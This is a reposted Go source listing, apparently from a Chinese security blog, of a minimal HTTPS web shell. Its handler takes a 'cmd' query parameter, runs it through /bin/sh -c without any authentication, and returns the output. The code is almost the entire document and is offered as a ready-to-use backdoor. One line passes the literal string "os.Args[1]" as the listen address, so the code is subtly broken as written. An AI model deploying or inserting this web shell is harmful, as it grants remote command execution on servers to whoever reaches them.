1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56
| package main
import ( "fmt" "log" "net/http" "os" "os/exec" )
var shell = "/bin/sh" var shellArg = "-c"
func main() { if len(os.Args) != 2 { fmt.Printf("Usage: %s <listenAddress>\n", os.Args[0]) fmt.Printf("Example: %s localhost:8080\n", os.Args[0]) os.Exit(1) }
http.HandleFunc("/", requestHandler) log.Println("Listening for HTTPS requests.") err := http.ListenAndServeTLS( "os.Args[1]", "cert.pem", "privateKey.pem", nil, ) if err != nil { log.Fatal("Error creating server. ", err) } }
func requestHandler(writer http.ResponseWriter, request *http.Request) { // Get command to execute from GET query parameters cmd := request.URL.Query().Get("cmd") if cmd == "" { fmt.Fprintln( writer, "No command provided. Example: /?cmd=whoami") return }
log.Printf("Request from %s: %s\n", request.RemoteAddr, cmd) fmt.Fprintf(writer, "You requested command: %s\n", cmd)
// Run the command command := exec.Command(shell, shellArg, cmd) output, err := command.Output() if err != nil { fmt.Fprintf(writer, "Error with command.\n%s\n", err.Error()) }
// Write output of command to the response writer interface fmt.Fprintf(writer, "Output: \n%s\n", output) }
|
文章来源: https://tonghuaroot.com/2020/01/01/Golang-webshell/
如有侵权请联系:admin#unsafe.sh